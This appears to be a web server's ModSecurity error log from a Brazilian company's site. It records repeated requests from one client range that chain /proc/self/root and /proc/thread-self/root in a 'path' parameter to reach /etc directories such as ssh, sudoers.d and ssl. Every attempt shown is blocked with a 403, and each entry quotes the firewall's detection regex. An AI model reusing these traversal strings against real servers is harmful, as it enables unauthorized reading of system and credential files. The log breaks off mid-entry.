https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:50.579095 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:41308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4UtY0UrI5A3LftIwr-QAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:52.372869 2026] [:error] [pid 17972:tid 140411725141760] [client 74.7.241.31:41322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4VIZ5-GlpYjVrXCrh3gAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:54.026954 2026] [:error] [pid 18211:tid 140411599251200] [client 74.7.241.31:41324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4VhcIZFNFgEhGGCRDwQAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:56.752231 2026] [:error] [pid 17972:tid 140411574073088] [client 74.7.241.31:41338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4WIZ5-GlpYjVrXCrh4wAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:06.077832 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47406] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:57:07.530812 2026] [:error] [pid 25836:tid 140411691570944] [client 74.7.241.31:40132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4Y4h-PF_25v4hFRCXuQAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:10.876665 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:40148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4ZYh-PF_25v4hFRCXvAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:11.138601 2026] [:error] [pid 25836:tid 140411674785536] [client 74.7.241.31:40148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4Z4h-PF_25v4hFRCXvQAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:11.659564 2026] [:error] [pid 25836:tid 140411607643904] [client 74.7.241.31:40148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4Z4h-PF_25v4hFRCXvgAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:13.103415 2026] [:error] [pid 18211:tid 140411699963648] [client 74.7.241.31:40158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4aRcIZFNFgEhGGCRDzAAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:14.733811 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:40174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4auyqAr6etmhZHNpTuQAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:14.734208 2026] [mime_magic:error] [pid 31803:tid 140411641214720] (70014)End of file found: [client 74.7.241.31:40174] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:15.203932 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:40190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4a9Y0UrI5A3LftIwsAAAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:57:16.507147 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:40206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4bNa6ubjKNq_cu4YzJwAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:57:18.647523 2026] [:error] [pid 25836:tid 140411632822016] [client 74.7.241.31:52534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4boh-PF_25v4hFRCXwgAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:57:20.130275 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.241.31:52540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4cOw_le52K8_3pV15PQAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:57:29.045899 2026] [proxy_fcgi:error] [pid 11816:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47916] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:57:30.412408 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.241.31:53568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4euw_le52K8_3pV15RAAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:57:35.115922 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.241.31:53570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4fxj0p0SRWAqcjGGmnQAAAwM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:57:36.931839 2026] [:error] [pid 25836:tid 140411582465792] [client 74.7.241.31:53578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4gIh-PF_25v4hFRCXyQAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:57:38.307271 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:41684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4gsdf6f5d65gmYZRrowAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:57:39.805858 2026] [:error] [pid 2598:tid 140411607643904] [client 74.7.241.31:41698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4gxj0p0SRWAqcjGGmnwAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:57:41.376599 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:41702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4hda6ubjKNq_cu4YzLQAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:57:41.903091 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:50400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4heyqAr6etmhZHNpTywAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:57:51.133786 2026] [proxy_fcgi:error] [pid 17972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48544] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:57:53.646818 2026] [:error] [pid 18211:tid 140411565680384] [client 74.7.243.128:41000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag 